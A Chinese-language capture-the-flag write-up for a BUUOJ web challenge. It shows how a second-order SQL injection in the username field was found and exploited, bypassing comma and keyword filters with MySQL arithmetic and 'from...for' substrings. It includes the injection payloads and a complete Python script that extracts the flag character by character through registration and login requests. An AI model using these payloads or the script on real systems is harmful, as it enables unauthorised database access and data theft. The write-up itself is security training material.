场景
既然有login.php那就会有register.php,访问。
注册一个账号进去。
登录进去后看到我们的用户名了。
猜测在用户名处存在二次注入,再注册一个账号。
用户名变成了0,证明存在二次注入。
fuzz之后发现逗号,information等许多关键字被过滤了。
绕过方法:
mysql中,+只能当做运算符。
执行select '1'+'1a'
时 结果
执行select '0'+database();
编程了0,但我们可以用ascii编码进行计算。
select '0'+ascii(substr(database(),1,1));
出来了库名第一位的ascii值。回到题目
因为过滤了逗号,所以用from for来代替
0'+ascii(substr(database() from 1 for 1))+'0;
成功回显,因为过滤了information,只能猜测字段名为flag
自己写了个脚本:
import requests
import logging
import re
from time import sleep
# LOG_FORMAT = "%(lineno)d - %(asctime)s - %(levelname)s - %(message)s"
# logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)
def search():
flag = ''
url = 'http://b52b0533-2f84-4c9b-bd73-e912ab23a59f.node3.buuoj.cn/'
url1 = url+'register.php'
url2 = url+'login.php'
for i in range(100):
sleep(0.3)#不加sleep就429了QAQ
data1 = {"email" : "1234{}@123.com".format(i), "username" : "0'+ascii(substr((select * from flag) from {} for 1))+'0;".format(i), "password" : "123"}
data2 = {"email" : "1234{}@123.com".format(i), "password" : "123"}
r1 = requests.post(url1, data=data1)
r2 = requests.post(url2, data=data2)
res = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',r2.text)
res1 = re.search(r'\d+', res.group())
flag = flag+chr(int(res1.group()))
print(flag)
print("final:"+flag)
if __name__ == '__main__':
search()